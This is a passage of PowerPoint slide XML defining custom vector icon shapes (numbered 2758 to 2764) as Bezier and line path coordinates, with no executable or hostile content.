                  <a:pt x="20310" y="7368"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21342" y="6339"/>
                  <a:pt x="21342" y="4671"/>
                  <a:pt x="20310" y="3641"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19726" y="3059"/>
                  <a:pt x="18937" y="2818"/>
                  <a:pt x="18175" y="2895"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18250" y="2137"/>
                  <a:pt x="18009" y="1353"/>
                  <a:pt x="17428" y="772"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16399" y="-257"/>
                  <a:pt x="14731" y="-257"/>
                  <a:pt x="13702" y="772"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12673" y="1802"/>
                  <a:pt x="12673" y="3470"/>
                  <a:pt x="13702" y="4498"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13729" y="4526"/>
                  <a:pt x="13763" y="4543"/>
                  <a:pt x="13791" y="4569"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4568" y="13791"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4542" y="13763"/>
                  <a:pt x="4526" y="13730"/>
                  <a:pt x="4498" y="13703"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3469" y="12674"/>
                  <a:pt x="1801" y="12674"/>
                  <a:pt x="772" y="13703"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-258" y="14732"/>
                  <a:pt x="-258" y="16400"/>
                  <a:pt x="772" y="17429"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1353" y="18010"/>
                  <a:pt x="2136" y="18251"/>
                  <a:pt x="2895" y="18176"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2818" y="18938"/>
                  <a:pt x="3058" y="19727"/>
                  <a:pt x="3641" y="20311"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4670" y="21343"/>
                  <a:pt x="6338" y="21343"/>
                  <a:pt x="7367" y="20311"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8396" y="19279"/>
                  <a:pt x="8396" y="17606"/>
                  <a:pt x="7367" y="16574"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7339" y="16546"/>
                  <a:pt x="7306" y="16529"/>
                  <a:pt x="7277" y="16503"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="16558" y="13703"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="16530" y="13731"/>
                  <a:pt x="16513" y="13764"/>
                  <a:pt x="16487" y="13793"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14254" y="11560"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14067" y="11391"/>
                  <a:pt x="13780" y="11393"/>
                  <a:pt x="13601" y="11573"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13421" y="11753"/>
                  <a:pt x="13419" y="12039"/>
                  <a:pt x="13588" y="12226"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13576" y="12237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16759" y="15420"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16792" y="15041"/>
                  <a:pt x="16947" y="14671"/>
                  <a:pt x="17238" y="14381"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17895" y="13726"/>
                  <a:pt x="18959" y="13726"/>
                  <a:pt x="19615" y="14381"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20273" y="15035"/>
                  <a:pt x="20273" y="16097"/>
                  <a:pt x="19615" y="16752"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19027" y="17339"/>
                  <a:pt x="18112" y="17395"/>
                  <a:pt x="17455" y="16929"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17442" y="16942"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17295" y="16832"/>
                  <a:pt x="17090" y="16839"/>
                  <a:pt x="16957" y="16974"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16826" y="17107"/>
                  <a:pt x="16819" y="17312"/>
                  <a:pt x="16923" y="17460"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16915" y="17469"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17379" y="18124"/>
                  <a:pt x="17322" y="19034"/>
                  <a:pt x="16736" y="19621"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16081" y="20276"/>
                  <a:pt x="15019" y="20276"/>
                  <a:pt x="14365" y="19621"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13710" y="18966"/>
                  <a:pt x="13710" y="17904"/>
                  <a:pt x="14365" y="17250"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14654" y="16960"/>
                  <a:pt x="15024" y="16807"/>
                  <a:pt x="15402" y="16773"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12222" y="13592"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12218" y="13596"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12031" y="13427"/>
                  <a:pt x="11744" y="13428"/>
                  <a:pt x="11565" y="13609"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11385" y="13789"/>
                  <a:pt x="11383" y="14075"/>
                  <a:pt x="11552" y="14262"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13776" y="16501"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13748" y="16528"/>
                  <a:pt x="13714" y="16544"/>
                  <a:pt x="13687" y="16572"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12658" y="17601"/>
                  <a:pt x="12658" y="19269"/>
                  <a:pt x="13687" y="20298"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14716" y="21328"/>
                  <a:pt x="16384" y="21328"/>
                  <a:pt x="17413" y="20298"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17994" y="19717"/>
                  <a:pt x="18235" y="18934"/>
                  <a:pt x="18160" y="18175"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18922" y="18252"/>
                  <a:pt x="19711" y="18011"/>
                  <a:pt x="20295" y="17429"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21327" y="16400"/>
                  <a:pt x="21327" y="14732"/>
                  <a:pt x="20295" y="13703"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19263" y="12674"/>
                  <a:pt x="17590" y="12674"/>
                  <a:pt x="16558" y="13703"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="4511" y="7368"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="4539" y="7340"/>
                  <a:pt x="4556" y="7306"/>
                  <a:pt x="4582" y="7278"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6815" y="9511"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7002" y="9679"/>
                  <a:pt x="7289" y="9678"/>
                  <a:pt x="7468" y="9498"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7649" y="9318"/>
                  <a:pt x="7650" y="9031"/>
                  <a:pt x="7481" y="8844"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7493" y="8833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4309" y="5650"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4277" y="6029"/>
                  <a:pt x="4122" y="6400"/>
                  <a:pt x="3831" y="6691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3175" y="7346"/>
                  <a:pt x="2110" y="7346"/>
                  <a:pt x="1453" y="6691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="797" y="6036"/>
                  <a:pt x="797" y="4974"/>
                  <a:pt x="1453" y="4319"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2042" y="3732"/>
                  <a:pt x="2957" y="3676"/>
                  <a:pt x="3614" y="4142"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3627" y="4128"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3774" y="4238"/>
                  <a:pt x="3979" y="4232"/>
                  <a:pt x="4112" y="4097"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4243" y="3963"/>
                  <a:pt x="4250" y="3759"/>
                  <a:pt x="4146" y="3610"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4154" y="3602"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3690" y="2947"/>
                  <a:pt x="3746" y="2036"/>
                  <a:pt x="4333" y="1450"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4988" y="795"/>
                  <a:pt x="6050" y="795"/>
                  <a:pt x="6705" y="1450"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7359" y="2105"/>
                  <a:pt x="7359" y="3166"/>
                  <a:pt x="6705" y="3821"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6415" y="4111"/>
                  <a:pt x="6046" y="4264"/>
                  <a:pt x="5667" y="4298"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8847" y="7478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8851" y="7475"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9038" y="7644"/>
                  <a:pt x="9325" y="7642"/>
                  <a:pt x="9504" y="7462"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9684" y="7282"/>
                  <a:pt x="9686" y="6995"/>
                  <a:pt x="9517" y="6808"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7293" y="4569"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7321" y="4543"/>
                  <a:pt x="7355" y="4526"/>
                  <a:pt x="7382" y="4498"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8411" y="3470"/>
                  <a:pt x="8411" y="1802"/>
                  <a:pt x="7382" y="772"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6353" y="-257"/>
                  <a:pt x="4685" y="-257"/>
                  <a:pt x="3656" y="772"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3075" y="1353"/>
                  <a:pt x="2834" y="2137"/>
                  <a:pt x="2909" y="2895"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2147" y="2818"/>
                  <a:pt x="1358" y="3059"/>
                  <a:pt x="774" y="3641"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-258" y="4671"/>
                  <a:pt x="-258" y="6339"/>
                  <a:pt x="774" y="7368"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1806" y="8397"/>
                  <a:pt x="3479" y="8397"/>
                  <a:pt x="4511" y="736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8" name="Shape 2758"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6238863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982" y="6873"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14727" y="6873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14727" y="8836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="982" y="8836"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="8836"/>
                  <a:pt x="982" y="6873"/>
                  <a:pt x="982" y="6873"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="982" y="9818"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14727" y="9818"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15269" y="9818"/>
                  <a:pt x="15709" y="9378"/>
                  <a:pt x="15709" y="8836"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15709" y="6873"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="6331"/>
                  <a:pt x="15269" y="5891"/>
                  <a:pt x="14727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moveTo>
                  <a:pt x="14727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14727" y="18655"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14727" y="18655"/>
                  <a:pt x="14727" y="20618"/>
                  <a:pt x="14727" y="20618"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="14727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14727" y="21600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15269" y="21600"/>
                  <a:pt x="15709" y="21160"/>
                  <a:pt x="15709" y="20618"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15709" y="18655"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="18113"/>
                  <a:pt x="15269" y="17673"/>
                  <a:pt x="14727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59" name="Shape 2759"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6772124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3927" y="6873"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17673" y="6873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17673" y="8836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3927" y="8836"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3927" y="8836"/>
                  <a:pt x="3927" y="6873"/>
                  <a:pt x="3927" y="6873"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17673" y="9818"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="18215" y="9818"/>
                  <a:pt x="18655" y="9378"/>
                  <a:pt x="18655" y="8836"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18655" y="6873"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18655" y="6331"/>
                  <a:pt x="18215" y="5891"/>
                  <a:pt x="17673" y="5891"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3927" y="5891"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3385" y="5891"/>
                  <a:pt x="2945" y="6331"/>
                  <a:pt x="2945" y="6873"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2945" y="8836"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2945" y="9378"/>
                  <a:pt x="3385" y="9818"/>
                  <a:pt x="3927" y="9818"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3927" y="9818"/>
                  <a:pt x="17673" y="9818"/>
                  <a:pt x="17673" y="9818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8655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17673" y="18655"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17673" y="18655"/>
                  <a:pt x="17673" y="20618"/>
                  <a:pt x="17673" y="20618"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17673" y="17673"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3927" y="17673"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3385" y="17673"/>
                  <a:pt x="2945" y="18113"/>
                  <a:pt x="2945" y="18655"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2945" y="20618"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2945" y="21160"/>
                  <a:pt x="3385" y="21600"/>
                  <a:pt x="3927" y="21600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17673" y="21600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18215" y="21600"/>
                  <a:pt x="18655" y="21160"/>
                  <a:pt x="18655" y="20618"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18655" y="18655"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18655" y="18113"/>
                  <a:pt x="18215" y="17673"/>
                  <a:pt x="17673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0" name="Shape 2760"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7305385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6873" y="8836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6873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6873" y="5891"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6331" y="5891"/>
                  <a:pt x="5891" y="6331"/>
                  <a:pt x="5891" y="6873"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5891" y="8836"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5891" y="9378"/>
                  <a:pt x="6331" y="9818"/>
                  <a:pt x="6873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0618"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6873" y="20618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6873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6873" y="17673"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6331" y="17673"/>
                  <a:pt x="5891" y="18113"/>
                  <a:pt x="5891" y="18655"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5891" y="20618"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5891" y="21160"/>
                  <a:pt x="6331" y="21600"/>
                  <a:pt x="6873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1" name="Shape 2761"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7838646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4727"/>
                  <a:pt x="20618" y="14727"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20618" y="11782"/>
                </a:move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4727"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="15270"/>
                  <a:pt x="440" y="15709"/>
                  <a:pt x="982" y="15709"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20618" y="15709"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21160" y="15709"/>
                  <a:pt x="21600" y="15270"/>
                  <a:pt x="21600" y="14727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20618" y="5891"/>
                </a:move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8"/>
                  <a:pt x="440" y="9818"/>
                  <a:pt x="982" y="9818"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20618" y="9818"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21160" y="9818"/>
                  <a:pt x="21600" y="9378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945"/>
                  <a:pt x="20618" y="2945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2945"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="3487"/>
                  <a:pt x="440" y="3927"/>
                  <a:pt x="982" y="3927"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20618" y="3927"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21160" y="3927"/>
                  <a:pt x="21600" y="3487"/>
                  <a:pt x="21600" y="2945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20618" y="20618"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="982" y="20618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="982" y="18655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20618" y="18655"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="18655"/>
                  <a:pt x="20618" y="20618"/>
                  <a:pt x="20618" y="20618"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20618" y="17673"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="982" y="17673"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="440" y="17673"/>
                  <a:pt x="0" y="18113"/>
                  <a:pt x="0" y="18655"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="20618"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="21160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18655"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="18113"/>
                  <a:pt x="21160" y="17673"/>
                  <a:pt x="20618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2" name="Shape 2762"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8371907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982"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="19520" y="982"/>
                  <a:pt x="20618" y="2081"/>
                  <a:pt x="20618" y="3436"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="4792"/>
                  <a:pt x="19520" y="5891"/>
                  <a:pt x="18164" y="5891"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16808" y="5891"/>
                  <a:pt x="15709" y="4792"/>
                  <a:pt x="15709" y="3436"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="2081"/>
                  <a:pt x="16808" y="982"/>
                  <a:pt x="18164" y="982"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="18164" y="6873"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="20062" y="6873"/>
                  <a:pt x="21600" y="5334"/>
                  <a:pt x="21600" y="3436"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="1538"/>
                  <a:pt x="20062" y="0"/>
                  <a:pt x="18164" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16266" y="0"/>
                  <a:pt x="14727" y="1538"/>
                  <a:pt x="14727" y="3436"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14727" y="5334"/>
                  <a:pt x="16266" y="6873"/>
                  <a:pt x="18164" y="6873"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="18164" y="3927"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18655" y="3927"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18925" y="3927"/>
                  <a:pt x="19145" y="3708"/>
                  <a:pt x="19145" y="3436"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19145" y="3165"/>
                  <a:pt x="18925" y="2945"/>
                  <a:pt x="18655" y="2945"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18655" y="2455"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18655" y="2183"/>
                  <a:pt x="18434" y="1964"/>
                  <a:pt x="18164" y="1964"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17893" y="1964"/>
                  <a:pt x="17673" y="2183"/>
                  <a:pt x="17673" y="2455"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17673" y="3436"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17673" y="3708"/>
                  <a:pt x="17893" y="3927"/>
                  <a:pt x="18164" y="3927"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="9818" y="11782"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4909" y="11782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4909" y="8836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9818" y="8836"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9818" y="8836"/>
                  <a:pt x="9818" y="11782"/>
                  <a:pt x="9818" y="11782"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="21109" y="12764"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11291" y="12764"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11562" y="12764"/>
                  <a:pt x="11782" y="12544"/>
                  <a:pt x="11782" y="12273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11782" y="12001"/>
                  <a:pt x="11562" y="11782"/>
                  <a:pt x="11291" y="11782"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10800" y="11782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10800" y="8836"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="8295"/>
                  <a:pt x="10360" y="7855"/>
                  <a:pt x="9818" y="7855"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4909" y="7855"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4367" y="7855"/>
                  <a:pt x="3927" y="8295"/>
                  <a:pt x="3927" y="8836"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3927" y="11782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3436" y="11782"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3166" y="11782"/>
                  <a:pt x="2945" y="12001"/>
                  <a:pt x="2945" y="12273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2945" y="12544"/>
                  <a:pt x="3166" y="12764"/>
                  <a:pt x="3436" y="12764"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="491" y="12764"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="220" y="12764"/>
                  <a:pt x="0" y="12983"/>
                  <a:pt x="0" y="13255"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="13526"/>
                  <a:pt x="220" y="13745"/>
                  <a:pt x="491" y="13745"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2945" y="13745"/>
                </a:ln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cubicBezTo>
                  <a:pt x="3707" y="21600"/>
                  <a:pt x="3927" y="21380"/>
                  <a:pt x="3927" y="21109"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3927" y="13745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17673" y="13745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lnTo>
                  <a:pt x="21109" y="13745"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21380" y="13745"/>
                  <a:pt x="21600" y="13526"/>
                  <a:pt x="21600" y="13255"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="12983"/>
                  <a:pt x="21380" y="12764"/>
                  <a:pt x="21109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3" name="Shape 2763"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905168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8"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="20006" y="12260"/>
                  <a:pt x="12624" y="19436"/>
                  <a:pt x="10800" y="20538"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8976" y="19436"/>
                  <a:pt x="1594" y="12260"/>
                  <a:pt x="1021" y="7001"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1021" y="7001"/>
                  <a:pt x="982" y="6718"/>
                  <a:pt x="982" y="6382"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="3405"/>
                  <a:pt x="3404" y="982"/>
                  <a:pt x="6382" y="982"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7780" y="982"/>
                  <a:pt x="9107" y="1518"/>
                  <a:pt x="10120" y="2491"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10585" y="2939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8836" y="6873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11291" y="9818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9327" y="14236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10800" y="16691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10432" y="14236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12365" y="9542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10002" y="6781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12069" y="2007"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12984" y="1345"/>
                  <a:pt x="14076" y="982"/>
                  <a:pt x="15218" y="982"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18196" y="982"/>
                  <a:pt x="20618" y="3405"/>
                  <a:pt x="20618" y="6382"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="6725"/>
                  <a:pt x="20579" y="7008"/>
                  <a:pt x="20579" y="7008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1"/>
                  <a:pt x="10800" y="1783"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9653" y="681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4" name="Shape 2764"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9438429" y="4495222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88" y="6611"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="20587" y="6619"/>
                  <a:pt x="20587" y="6627"/>
                  <a:pt x="20586" y="6635"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20585" y="6640"/>
                  <a:pt x="20582" y="6674"/>
                  <a:pt x="20581" y="6680"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20107" y="11287"/>
                  <a:pt x="14607" y="17428"/>
                  <a:pt x="12595" y="19086"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11905" y="15660"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13960" y="10631"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11429" y="7425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12699" y="2550"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12708" y="2540"/>
                  <a:pt x="12713" y="2534"/>
